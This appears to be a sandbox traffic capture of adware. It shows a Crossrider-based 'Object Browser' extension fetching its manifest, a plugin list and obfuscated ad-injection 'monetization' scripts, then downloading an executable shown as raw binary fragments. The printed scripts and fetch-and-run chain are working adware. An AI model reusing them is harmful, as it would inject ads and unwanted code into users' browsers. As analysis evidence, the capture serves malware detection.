    d=noFdkXddP3gi7XcoTFLBN15zmA7lYbp7xUM/vSD6F0VBeVHdWRTByZJXq3sWt XThlcnJJyP6ltV6qQG9EjLw9BYc63hq/wczKeniDUG3rz7O G7mtHYZOVAye KL rYDr7LC/2HaCuBoXnVzMMjXgEjSuz sXrcCfeoNaIP  ZG5HkGQDpY0voe1EE5aLEjOVSCCGR2Bh6KDgI0j6d1hYAnqm9waRO8bLTgLNAC2fmN1o1ywaeQ0mzvgxhptSaEhYphMMa1LAObG/i3mqbkmrYD0OYU8LfPUSkKlosWCXccNylGRT n5U3IWuBGpiBUMWMCdHXepsJJd9ki886r7RBwoKx9hnfPCSGcO9mdh/wu7bQlbRlB2Ic3nLABPHOHLkYYxCL8DT9Y0XDmP3YaU0cibmNQdVkWtZRezacP7ut yrZcuAS4/0k9Bj8GhfloWfmwAHlZXOFNr749V0RUKrz7RwbbedtZmUydYn8n6i1VS9uC/sOamJUldnCtBUy aAzn5jFhSHb33YCyDvUtHKLBQJY0iJve iIM6vTdEXkt98j h5AddztVKiMzMvdxyKqKQdNZ8po7IiDwx9PHnuiyqh6LJ q7Ncxnud6n9EM9w5eLMgpqZKuwPCxaX4Fy7FT1jnj5gJKbfdfDCpuRpnumgCCUE80o9WxrUgTXiiz8E8pJrc8eTqN6JSP1PQDjysIq4DFIi78rn9rr5/PaqsUSzfrs92ZABnzUa6H0YoFCGy7W90PQb6RgyfTHY88fiQOU92uH31SWh14GWQUSC0miNjHrboL11tljIdgwrzM631QZNuP4ihnSN7vt qkyG0XkD8jaQBLhSRpsERCFL JAXn2ATgK3uFQrq9Hd6zQQFbPY/iqNheuLUcCzsNH6hyLDwDXnh5Phbxpff0hpOS5cph5/vLR8uANxvu9ZyhPdvhG3NlYLFNuMdAX1SLucePEs/9cdaYs8020kUXHRcTfbbraBmG9ixyzDPYkaIYGCgQvoLhWjStcZgs qGI5nEA3KGdNbVK0cKCiPI1tESUR1c0cLRckjEchrMVFhQc3gtSNrP 6VOWUnwhzAg0CbCb
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 0
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:08 GMT
    Connection: keep-alive


    GET /plugin/apps/48292/manifest/1_34_05_12/ie6/manifest.xml?ver=55&rnd=3431 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:34 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401208834"
    Last-Modified: Tue, 27 May 2014 16:40:34 GMT
    Cache-Control: max-age=900
    Content-Length: 1681
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1401908133.dop012.am4.t,1401908134.cds048.am4.pr
    HTTP/1.1 200 OK..Date: Wed, 04 Jun 2014 18:55:34 GMT..Keep-Alive: time
    out=10, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "
    1401208834"..Last-Modified: Tue, 27 May 2014 16:40:34 GMT..Cache-Contr
    ol: max-age=900..Content-Length: 1681..Content-Type: text/xml; charset
    =UTF-8..X-HW: 1401908133.dop012.am4.t,1401908134.cds048.am4.pr..<?x
    ml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>
    61</Ver>. <ShortName>Sense</ShortName>. <Descri
    ption>.</Description>. <PublisherName>Object Browser&l
    t;/PublisherName>. <HomePageLink>NA</HomePageLink>. &
    lt;JSLink>hXXp://js.clientstatsservice.com/plugin/apps/48292/js/na/
    ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <
    ;Domain>NA</Domain>. <RunInIframe>false</RunInIfram
    e>. <ThanksURL>NA</ThanksURL>. <EmailSignature>
    NA</EmailSignature>. <SettingsURL>NA</SettingsURL>.
    <CertifiedInstall>NA</CertifiedInstall>. <ExposeSite
    s>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApi
    URL>. <DisableIE>true</DisableIE>. <DisableFF>t
    rue</DisableFF>. <EnableSearchIE>false</EnableSearchIE
    >. <EnableSearchFF>false</EnableSearchFF>. <Addres
    sbarIE>NA</AddressbarIE>. <AddressbarFF>NA</Address
    barFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>
    ;. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>

    <<< skipped >>>

    GET /plugin/apps/48292/js/na/ie/app_code.js?ver=61&rnd=9245 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:36 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401208638"
    Last-Modified: Tue, 27 May 2014 16:37:18 GMT
    Cache-Control: max-age=206
    Content-Length: 616
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908136.dop012.am4.t,1401908136.cds051.am4.c
    ..  /*****************************************************************
    *******************. This is your Page Code. The appAPI.ready() code
    block will be executed on every page load.. For more information plea
    se visit our docs site: hXXp://docs.crossrider.com.*******************
    ******************************************************************/..a
    ppAPI.ready(function($) {.. // Place your code here (you can also d
    efine new functions above this scope). // The $ object is the exten
    sion's jQuery object.. // alert("My new Crossrider extension works!
    The current page is: " document.location.href);..});..
    ....



    GET /plugin/apps/48292/plugins/na/ie/plugins.json?ver=56&rnd=2231 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:36 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401208639"
    Last-Modified: Tue, 27 May 2014 16:37:19 GMT
    Cache-Control: max-age=861
    Content-Length: 19054
    Content-Type: text/plain; charset=UTF-8
    X-HW: 1401908136.dop012.am4.t,1401908136.cds008.am4.c
    {"plugins_list":.    [.      {"id":1,"url":"hXXp://js.clientstatsservi
    ce.com/plugins/mins/base.js","ver":10,"name":"base","browsers":{"ie":t
    rue,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"
    run_at":1,"order":10400},{"run_at":2,"order":10400}],"enabled":true},{
    "id":4,"url":"hXXp://js.clientstatsservice.com/plugins/javascripts/jqu
    ery-1_7_1_min.js","ver":4,"name":"jquery_1_7_1","browsers":{"ie":true,
    "ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at
    ":1,"order":10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{
    "run_at":2,"order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.cl
    ientstatsservice.com/plugins/mins/ie8_fix_1.js","ver":2,"name":"ie8_fi
    x_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false
    ,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"order"
    :10100}],"enabled":true},{"id":3,"url":"hXXp://js.clientstatsservice.c
    om/plugins/mins/ie8_fix_2.js","ver":2,"name":"ie8_fix_2","browsers":{"
    ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targ
    ets":[{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled"
    :true},{"id":28,"url":"hXXp://js.clientstatsservice.com/plugins/mins/i
    nitializer.js","ver":4,"name":"initializer","browsers":{"ie":true,"ff"
    :true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":
    1,"order":999999999},{"run_at":2,"order":999999999}],"enabled":true},{
    "id":21,"url":"hXXp://js.clientstatsservice.com/plugins/mins/debug.js"
    ,"ver":5,"name":"debug","browsers":{"ie":true,"ff":true,"ch":true,

    <<< skipped >>>

    GET /plugins/mins/monetization/geo/intext_5_j_m.js?ver=1&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:36 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401905690"
    Last-Modified: Wed, 04 Jun 2014 18:14:50 GMT
    Cache-Control: max-age=663
    Content-Length: 1027
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908136.dop012.am4.t,1401908136.cds013.am4.c
    if (typeof setup2 === 'function') { setup2('MTE3ODQzNDI1ODRjNTYwZTA1MW
    YxYTI3MTEwZTVhNTY1NDQ0MTkxZjFlMDI1OTRkNTcwZjEwMDgxMjBhMDkxYTA2NTM1NTBk
    NWEwNzFhMGEwNzEzMGEwYTFjNDIxYTAzMDU0NDE5MDcwMTRkMGU1ZjQ2NTc0ODA5MGU1ZD
    NjM2QzYjNlM2IzNTIyMzkyMzM2MjYzMDI3M2YyMTI0MmUyMjJlMmQzYzRkMTQ0MjFlMTU0
    ZTFiMDMxNjVlNTM0ODU1NDA0MDE0MTMxZTRmM2MzZDNiM2UzYjM1MjIzOTIzMzYyNjMwMj
    cyZDI0MzYyZTI1MmIzZjI2M2QyNzRhMDcxZjAyMWYwZjFmMGEwNjQ1MzMyYjI1MjMyNDM5
    MjEzMTJiM2MyOTI2MzkzODI1MzkyNjIyMmUzNDI5MjYzOTI0MzgyZjIwM2MyYjNjMzMyYj
    Q0NWQ2MTRhNTI0MzQyNWEwNDAwMTIwMTE4M2YwMDBmNDA0MjRjNTYwZTA1MWYxYTAxNTk0
    ZDU3MGYxMDA4MTIwYTA5MWEwNjUzNTUwZDVhMDcxYTBhMDcxMzBhMGExYzQyMWEwMzA1ND
    QxOTA3MDE0ZDBlNWY0NjU3NDgwOTBlNWQzYzNkM2IzZTNiMzUyMjM5MjMzNjI2MzAyNzNm
    MjEyNDJlMjIyZTJkM2M0ZDE0NDIxZTE1NGUxYjAzMTY1ZTUzNDg1NTQwNDAxNDEzMWU0Zj
    NjM2QzYjNlM2IzNTIyMzkyMzM2MjYzMDI3MmQyNDM2MmUyNTJiM2YyNjNkMjc0YTA3MWYw
    MjFmMGYxZjBhMDY0NTMzMmIyNTIzMjQzOTIxMzEyYjNjMjkyNjM5MzgyNTM5MjYyMjJlMz
    QyOTI2MzkyNDM4MmYyMDNjMmIzYzMzMmI0NDVkNjE0YTUyNDM0MjVhMWMxODEzMTYwMjA0
    M2IwNzQwNDI0YzQ2NTA0MjYxMTc=', 'jrcbxltfqk'); }
    ....



    GET /plugins/mins/monetization/geo/dealply_m.js?ver=8&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:36 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401904989"
    Last-Modified: Wed, 04 Jun 2014 18:03:09 GMT
    Cache-Control: max-age=848
    Content-Length: 1023
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908136.dop012.am4.t,1401908136.cds029.am4.c
    if (typeof setup2 === 'function') { setup2('MWU2NDQyNTQ0NDU0NTYwZTEyMT
    cxNTNiMTAxODQ2NGU1NDQ0MGUxNzExMWU1ODViNGIxZDVhMDUxNDA3MTcwNDExNWEwZDFh
    MTIwOTQ5MDAxNzBhMTA1YjBlMTUwMjA3MTUwMDE3MDcxMjAwNGExZTA3NTkwNTBiMDQwMD
    BjMTEwODQ5MTcxNDAyMTEzYTMxM2QzNzM2M2IyNzM1MzQyYTIxMmIzMDJiMjEyYzIwMjMy
    ODI3MjAyYTNkMjczMTM2MmIyZjIyM2MzYTQ4MDMwNDE0MjAxZDEyMGEwNjU4MzEzZDM3Mz
    YzYjI3MzUzNDJhMjEyYjMwMmIyNTI0MjQzOTI4MjIyODJiM2QyYjQyMWMxZDAyNWIzYzNh
    MmQzMDNiMzcyNzI2MmYyMjI2MzczMTM3MjcyMTI2MmIyZjIyM2MzYTRjNGU3ZTQ0NTQ1ND
    Q2NDQwYjExMWExMjA3MzEwNjE4NDQ1YzQzNDcwNjE2MDAxNDA3NGU0OTQ5MGEzYTBkMTAx
    MDE2MWUwNzM5MGYwZDAzMDE0YzAwMDgwNzE3MDIwODRkMDYwMTBmNWIwNzA2MTAxNDQ5MD
    kwNDE4MDMwNzA3MDYxZDE2MTI0ZDBmMWQ1ZDE3MGMxNTFhMDgwMzBmNTgwZDEwMTAxNjJi
    MmIzOTI1MzEyYTNkMzEyNjJkMzAzMTM0MzkyNjNkM2EyNzNhMjAzMTMwMzkzNTM2MjczMT
    JiMzAzYjJiNTIwNzE2MTMzMTA3MTYxODAxNDkyYjM5MjUzMTJhM2QzMTI2MmQzMDMxMzQz
    OTIyMzUzZTNkM2EyNTM5MzEzOTM5NDUwZDA3MDY0OTNiMmIzNzM0MjkzMDM2M2MyYjMwMj
    EyNjJiMzMzNTI2MzczMTJiMzAzYjJiNTY0YTZjNDM0NTRlNDI1NjE0MTgwMTAxMGYwZDJj
    MGE0MDRlNDQ0NTQ0NTQ2YzFl', 'enbtdttffc'); }
    ....



    GET /plugins/mins/monetization/setup.js?ver=11&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:35 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401299688"
    Last-Modified: Wed, 28 May 2014 17:54:48 GMT
    Cache-Control: max-age=751
    Content-Length: 6298
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908135.dop012.am4.t,1401908135.cds046.am4.c
    var _0x25da=["\x73\x74\x72\x69\x6E\x67","\x6C\x65\x6E\x67\x74\x68","\x
    63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x72\x65\x70\x6C\x61\x63\x65"
    ,"\x6D\x61\x74\x63\x68","\x6D\x61\x70","\x61\x70\x70\x6C\x79","\x66\x7
    2\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x75\x74\x69\x6C\x73","\x4
    2\x61\x73\x65\x36\x34","\x64\x65\x63\x6F\x64\x65","\x63\x61\x6C\x6C","
    \x70\x61\x72\x73\x65","\x4A\x53\x4F\x4E","\x6D\x6F\x6E\x65\x74\x69\x7A
    \x61\x74\x69\x6F\x6E","\x69\x6E\x74\x65\x72\x6E\x61\x6C","\x70\x6C\x75
    \x67\x69\x6E\x73","\x75\x6E","\x64\x65\x66","\x69\x6E\x65\x64","\x70\x
    6C\x75\x67\x69\x6E\x49\x64","\x67\x65\x74\x45\x78\x74\x65\x6E\x64\x65\
    x64\x53\x75\x62\x49\x64","\x66\x75\x6E\x63\x74\x69\x6F\x6E","\x73\x6C\
    x69\x63\x65","\x67\x65\x74\x53\x75\x62\x49\x64","\x67\x65\x74\x54\x69\
    x6D\x65","\x68\x74\x74\x70\x55\x72\x6C","\x5F\x5F\x52\x4E\x44\x5F\x5F"
    ,"\x67","\x5F\x5F\x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x45\x58\
    x54\x45\x4E\x44\x45\x44\x5F\x53\x55\x42\x5F\x49\x44\x5F\x5F","\x5F\x5F
    \x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x55\x53\x45\x52\x5F\x49\x
    44\x5F\x5F","\x75\x73\x65\x72\x49\x64","\x61\x70\x70\x49\x6E\x66\x6F",
    "\x5F\x5F\x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x49\x4E\x53\x54\
    x41\x4C\x4C\x45\x52\x5F\x55\x53\x45\x52\x5F\x49\x44\x5F\x5F","\x67\x65
    \x74\x55\x73\x65\x72\x49\x64","\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72","
    \x5F\x5F\x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x41\x50\x50\x5F\x
    49\x44\x5F\x5F","\x61\x70\x70\x49\x44","\x5F\x5F\x43\x52\x4F\x53\x53\x
    52\x49\x44\x45\x52\x5F\x42\x52\x4F\x57\x53\x45\x52\x5F\x5F","\x74\

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1
    Range: bytes=0-249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 0-249999/5945624
    Age: 22285
    X-Cache: Hit from cloudfront
    Via: 1.1 cc646cad4582373371b338cfa73dd8a8.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: ClCRa-puwUKGsbbK5QzMS7qBK-tN3pMBCtfUo1_pxJteRAsWs4IJtQ==
    MZ......................@.............................................
    ..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
    .....................l......#[email protected]
    ......mh[....... ..........................................B..........
    ..Z.p.................................................................
    ...........................text...@........................... .0`.dat
    [email protected]...#.......$................
    [email protected]@.bss..................................0..idata..................
    [email protected]... ....... [email protected]....
    [email protected].............................................
    ......................................................................
    ......................................................................
    ......................................................................
    ......................................................................
    ............................................U..WVS.......U..E....t...F
    .........;D..H...H.......M..E..5H;D..D$...$....D..M..E.....SS...E...$.
    D$... .D..M..E......M.WW......M.)..M..NT....NP........E.....}...VT....
    ....FP..E........}..VP........U.......FT.............}..........E..M..
    .$..|.D..E..R...D$..E..D$...$....D.....<$....D..E..Q.}.;}...Q....~X
    ........F4..$....D...W..........$.E......E......D$.........D.RR.FX..$.
    D$.....D..5..D.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$..;D.
    ....D...|.......T$...$..QQ.<$....D.S.M..E..D$...$....D.PP1....D

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=500000-749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 500000-749999/5945624
    Age: 22288
    X-Cache: Hit from cloudfront
    Via: 1.1 cc646cad4582373371b338cfa73dd8a8.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: rhylfIsCPzcSpi57EgWq2BtTiE9337WC3gKL4KGQD_KaQec_FhCNqQ==
    F.P/esqZ.#.....Fln...s...O.(.d...._.......m...}.[T.6b.`b..~.!{.Y.,7..S
    ..../r@7<.....s.c...Fz....d......}g..1..Q..A....H.4&..X...o.7./....
    ..q.;d.....P...s.R..3j{.7...3..O.~Y$...6P|d.J.M8.._...C.4n../..X..S,m.
    %.....F...>^..0. v-.Vs#...R.Y%...r.^A......a...B..G|.A.....9?~.d.`
    .....fN..I.u.....4.lG.P.Y.....3.B..w..2..z.6.x#\........x.31....0.....
    {|..e.P.K.D9......J&?.%!.>..R......).. 7P....."......jF'...kK.ci@..
    .j. u./(.3A.J%....v.t......3U. -.x.$...d..m.....xf.....X.."Y.A.\..2.:.
    Z.j.;...Y......:.C..<.=P.W6,../..{)..M.`(.B..[...N... ...J......SK3
    .W..=......X..\....|..9 .b.x...K<..............x (|...U. ..X.......
    ..V.s...tur....uA..4.>oqh.o.C..7.OW...i..:..x...V<....A.n...5...
    .{p\=i...."~......HI. .(.|}.=.....Q=q2.....]W.......I...h_n..mx..)&..L
    N...W..$Z.....,...d....v.'y.........9S8...T.....-....1....Q..e )A]./H.
    ']s..J. ...{....~p'....QU..\.w.`R.P..{.q...HI..Ng.6]..Q..._~..a.3..n..
    .*..N.dD3.b...g.y..p8..5 .%|..........T5!...M..#.GL.:....fM.....Vy%SC.
    ....F.%..y..50.....h.#....av.......7...HTT..L....;...bv...y[.Z..9(CiL.
    .. ....gH.&{$R.........4.....~...E.6..17..`........^..s....c%...9....R
    ./......z.l.f..i..j..n..V,.....<....._N3.P].......:........b.....X6
    ....M..|.q.0..%?....Z.Am..X`v..B.....GG..8./qd....T.)...}\....dM.c....
    [email protected].;{[email protected].#.^k...}.............K.k
    .. ..-...H...l./...*..g..A..u.......?)&/........}..z.}..`j. o.[.......
    m;<.iy$...4M.. .....KP..6..(e..B`.9..d....Y.>.'.H....Cy.f$....^.
    ....mL...H..U".4.c..^.........D...$e...........I&.p..4......{..3.

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=1250000-1499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1250000-1499999/5945624
    Age: 22292
    X-Cache: Hit from cloudfront
    Via: 1.1 cc646cad4582373371b338cfa73dd8a8.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: sxG2RtshHexH1NlPihwedqXJ6iSkBxQtXhGeWRtnvc7HoUHSlBw67w==
    .f [email protected].......)....&....)....y..}...= ._......
    ..k.........*.P..e...>6.....q.(..Y7...U.... ......B.PL...L{..P.c...
    }............!.iN...U........7g.A.!8......uyR...o.i.N..53I.-O-. t.....
    ..o{3.<l.Kq.?V.0`.:.!......S`..\.r.g2.......>....$.3.p..`}.0..*1
    <[email protected]...<...b2..m... ....a..C.\[..3..4j...c..7T.h......-J5.
    6.?SD.6p....l._.......!(..u..........?|.p#..mp..#.... y....!.......c..
    T...."..).).M.Ib^.=...m.........Y../..a..R\...7..d...V.|.........`T.1&
    gt;/..DC)..:..bxD....V.PD..t:. \...IrX...x~.qrN[%..5.zcD.....;K......N
    "[email protected])..dhn,..lz.....\....."C".......".s...`........*M.....
    (......9......o'..E.!..1.M......1...lR....9.-....t.z...Gz....B[.`.j...
    3<.......^.4...F..*...o.....6h...Qt..?.>N..DX..*.....1Y...'..!.j
    9P..E...[.y.pU&.....]1N...G..MQ........t.9.n/'......S-.Q.n..|pZ.....m.
    ..u0.....!....q-8...f.V.#........s....F.Mz.G....B....y..%8..^....c.b2F
    .....neL..H.e..\......axSa......0....S3(.....&U..Q...u.o.C..O..H..#..z
    ..h.hY-D...k.0.n..1.`t..!.....].oit......QX..-]%u..s....M...25.W......
    .h.....^{....B..U..~.I..]&..g4....Y'|)...%`0....":3...J..t>..Od.*.d
    X....=.....,{.~R.Jm...C.Ah.KK2...k.=.......]......&..O.K..1.#.RP3.Q.".
    .......*=.4.{....n..H.{T.YJIQ.....K..u...>...S...P..38..c...kG"....
    8..._ra.c....w.BNHTaI7...........2".[..Bw..`.].:...."..bLY}...M]..*B$B
    Cs....K...q......0......Fv.U.M...M.'..J...H"a.w@#...\.'&.<lUr...I..
    .s.$......fU......G.uL....pS.....u..Am. 7.K..y.....n.{7X...2.J{...<
    }'..<MW)2?.} m.....8>"y5....[(..|........-.M.FH5.s-..>GU.

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=1750000-1999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1750000-1999999/5945624
    Age: 22295
    X-Cache: Hit from cloudfront
    Via: 1.1 cc646cad4582373371b338cfa73dd8a8.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: xAePZBq7y-lj-oNXeR0rkyj91qA7DRb2kSWTZkVVm3atOMz4HTDLiw==
    ..H.......2.S...Zh...Y.v.i<.o.7..?..v>..."X  0.}...J.Mh.....q.t.
    ...0..........U...E.,..X.[P......V.i.\01..YIt.....hG..V.0.g.(| ...o...
    .o.~. ..^M........f...lp.c.Z.'.L...!.U......V]..I.#tEN........K..!....
    ..=)..Y.X9.s ..KO.r f&.$......{....i_q.....1DA..0q..E....g,..C..t.....
    ..(.._....o<i.P......-..&~8f..F.3_....N...............U..>......
    ...O..H. ....B.v_kI.f,...... $.;[..3....O....8.A......2.B..MRZj0..i..]
    X.....oE"`.pU.yO..w._.FA.../k....I,?...$..B..'3OL ./ vd.(..r.....)..!.
    ..=of..g*.b.e.........VcO....2.V.....Jd.8.\{.kzm......x..D:.R..a.../V.
    .E... ..c7z..hc.'...][email protected].<. .>2.\S..<.......e.]..
    ...%....9....b...3.....C~EI..Zo.........0..&..w..$.v.b-.a...6G...C4...
    %H..v.&.q..Q...GD...A.....]p.3........*..L.h.pb....l..Np..._x,.....|..
    b5.5....l.9.R(8.......E.[...UJ.j.-..p....$.......L..#....wp....u.\ .j.
    ..4.Gb.p.,.~..1..p..E6..^.{...O.......'../.O..W.nAu.E...U}..t!x.%.'..g
    :..h..3a......E........./D.}b.\_<.a>....N}Da..K.WG..h.......pd^.
    ...0..k..T0vn.T(.N<.qxF....W.0..:....e...C)m.,.`..q.%C......y%.A.EO
    ...Rc.-L..H;}..i.A2K..#..ry.... 7]..v.......;@.h.w.....^.....g..'s...;
    :..0X.K.5....5..v(.m%.._...Z&.".ea^4c_..(.....T.[.u........`j.$..1....
    ..g.ed...j{.....1:...........t...'..C.{.....D..X........KL]......P ..-
    ,.a..E.ILi^c1...T.p...` #t\..q..$/l.(.r;......*..1oE%....DkX........`.
    .E..y; .|........x..h.y...Wf.....bhG..4...'.u.o^.#e.7..k..A...]0;.h`..
    Pv(|H..}\..%.(,....`*F.D...q...0A...6.....).2..~%{.M..F......{.e....I.
    ...`....O..-Mq.......... ...d!x.L_Ge.5.9_...?...v.v...`.xQ,....\k#

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=2250000-2499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2250000-2499999/5945624
    Age: 22299
    X-Cache: Hit from cloudfront
    Via: 1.1 cc646cad4582373371b338cfa73dd8a8.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: DxIghiphap8W5mMi2ICWpdp0Sg1pVgcWpbV_d1rHgT4sXYTRqSTMeg==
    3lG.hx0.W%../..i.M...n.......K.....k...H..[...........O.c'........v.{/
    ..u.%.L(............2.......yr..D.....e.p&......{...G....K.5..CF...]:.
    .gE..A...6..=.|B......x8.VJl..B.1.T.;f..R...?....xRb..h....!..B.....o.
    ...q\.Z.V|....rd...&..k..].V..QQ.D..cE.[.n0.os.5.it.>.c....v....I..
    .b...N.._......[...G1........R.....1m..R...[<.......J.5s.E...|..6.R
    .L.G...21.... .;0P2....].. ...6.K....#.....1..j`.....3,...........m./.
    .m..I?.5..{....z...Q.:........e....;Z..6..1lo...)..t.k.W.7..../].fp5..
    $...s~...&.-1p.t..........i..d..b.....2...9....Wp...m..%..8F.r....;..f
    ...`}.R...i.&.!V.RDA.."A.N.....l*.&c-)...K......0?.........H.]*.$-..M.
    ...4.....6..Yi..c...3.?...|."T.I...pa09YR....2.]W..q.......U..j..1G...
    .t.E...n.:.n]vUYL........='....*.9........~.`../AA..x...h.......uF9.7B
    w4...FE.6..H'. ...h;.X...V.......^z.AWh.[j..j.._;..V.x.7...fd#..o_....
    .e...[.q..O...o!..eJ. ......sY.).!%.......`..r.R.X.T...l.>.?$....q.
    ....x=(....K..a..mfiH..<..$........t.fv......ypV..*[email protected]=...o=/
    D.OA...m. ..v3.ovD.4H..<.`t/....]....v......s....M...8..#.7.2..*...
    ..^......U nb.....n..:..7...Aa..>Y..W5..K.Uw.2..Mn../N............i
    ....'gk=..%.PE.8,..[O.u....u...S.K,...)#l..3.Y....B..q(.e......9.....^
    :..z._...EJ.w:.!}*.lFZ.D....5.Aoc.......JO... k..x...*pe..dbs.k.c. ..5
    ..a..#..5J1....oL.?..@i?0$&.: j6...7.....O.&qg.sa`.&pk...m...$..*J9.).
    9M.....C0W....g..?`.p.:.......T.......!.9...!..~..}.1....o....k....!.A
